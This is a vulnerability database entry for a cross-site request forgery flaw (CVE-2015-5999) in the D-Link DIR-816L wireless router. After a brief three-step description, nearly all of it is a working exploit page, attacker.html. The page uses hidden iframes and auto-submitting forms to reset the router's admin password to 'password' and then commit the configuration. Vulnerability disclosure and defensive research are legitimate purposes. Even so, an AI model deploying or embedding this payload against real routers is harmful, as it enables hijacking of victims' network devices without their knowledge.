D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery (CVE-2015-5999)

2017-03-14T00:00:00
ID SSV:92774
Type seebug
Reporter Root
Modified 2017-03-14T00:00:00

Description

1) User login to DIR-816L wireless router

2) User visits the attacker's malicious web page (attacker.html)

3) attacker.html exploits CSRF vulnerability and changes the admin account password

PoC video link: http://youtu.be/UBdR2sUc8Wg

                                        
                                            
                                                Exploit code (attacker.html):
<html>
<body>
<iframe style="display:none" name="hiddenpost"></iframe>
<form action="http://192.168.0.1/hedwig.cgi" method="POST" enctype="text/plain" target="hiddenpost" id="csrf">
<input type="hidden" name="<?xml version" value=""1.0" encoding="UTF-8"?>
<postxml>
<module>
	<service>DEVICE.ACCOUNT</service>
	<device>
		<gw_name>DIR-816L</gw_name>
		
		<account>
			<seqno>1</seqno>
			<max>2</max>
			<count>1</count>
			<entry>
				<uid>USR-</uid>
				<name>Admin</name>
				<usrid/>
				<password>password</password>
				<group>0</group>
				<description/>
			</entry>
		</account>
		<group>
			<seqno/>
			<max/>
			<count>0</count>
		</group>
		<session>
			<captcha>1</captcha>
			<dummy/>
			<timeout>180</timeout>
			<maxsession>128</maxsession>
			<maxauthorized>16</maxauthorized>
		</session>
	</device>
</module>
<module>
	<service>HTTP.WAN-1</service>
	<inf>
		<web></web>
		<https_rport></https_rport>
		<stunnel>1</stunnel>
		<weballow>
			<hostv4ip/>
		</weballow>
		<inbfilter/>
	</inf>
	
</module>
<module>
	<service>HTTP.WAN-2</service>
	<inf>
		<active>0</active>
		<nat>NAT-1</nat>
		<web/>
		<weballow>
			<hostv4ip/>
		</weballow>
	</inf>
	
</module>
<module>
	<service>INBFILTER</service>
	<acl>
		<inbfilter>		
						<seqno>1</seqno>
			<max>24</max>
			<count>0</count>

		</inbfilter>		
	</acl>
	<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY><SETCFG>ignore</SETCFG></module>
<module>
	<service>SHAREPORT</service>
	<FATLADY>ignore</FATLADY>
	
<ACTIVATE>ignore</ACTIVATE></module>
<module>
	<service>SAMBA</service>
	<samba>		
		    
		<enable>1</enable>
		<auth>1</auth>

    </samba>
</module>
</postxml>" />
</form>
<script>alert("This is CSRF PoC");document.getElementById("csrf").submit()</script>
<iframe style="display:none" name="hiddencommit"></iframe>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="POST" target="hiddencommit" id="csrf1">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE" />
</form>
<script>document.getElementById("csrf1").submit()</script>
 
</body>
</html>